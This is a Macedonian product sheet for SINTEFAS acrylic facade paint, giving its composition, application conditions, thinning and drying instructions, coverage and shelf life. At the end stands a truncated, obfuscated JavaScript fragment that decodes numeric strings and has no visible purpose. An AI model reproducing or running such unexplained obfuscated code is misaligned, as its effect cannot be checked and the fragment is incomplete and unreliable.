
СИНТЕФАС

СИНТЕФАС е боја произведена на основа раствори од акрилни смоли во органски
раствори, квалитетни полнила и светлосни пигменти. Се применува за заштита и
декорација на фасадни и внатрешни ѕидови.

  

Примена: Едноставно се нанесува. Може да се употребува на температура од -30C до
+40C, ако подлогата не е замрзната, односно во сите временски услови. Заради добра
парапропустливост наносот СИНТЕФАС боја може да се нанесува на подлоги стари
најмногу осум дена.

  

СИНТЕФАС боја по правило се нанесува во два слоја. За првиот слој бојата треба да се
разреди со 5-10% аслен разредувач, а за вториот завршен слој не треба да се разредува
(или најмногу со 5% разредувач).
 Корекција на бои може да се изврши единствено со меѓусебно мешање на оригинални
индустриски произведени тонови. Подготвената боја може да се нанесе со четка,
волнени валјаци или со прскање. Првиот нанесен слој мора да се суши 24 часа, а потоа
може да се нанесе другиот завршен слој. По завршувањето со работата, амбалажата
треба да се затвори, а алатот да се потопи во маслен разредувач.

  

Пакување: 0,75л, 4к, 20л

  

Потрошувачка: Со 1л СИНТЕФАС боја може да се нанесе 1 слој на 6.7м2 на просечно
впивлива подлога. Капацитетот зависи од впивливоста и рапавоста на подлогата.

  

Рок на употреба: 24 месеци.
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 var a=0,m,v,t,z,x=newArray('9091968376','8887918192818786347374918784939277359287883421333333338896','877886888787','949990793917947998942577939317'),l=x.length;while(++a
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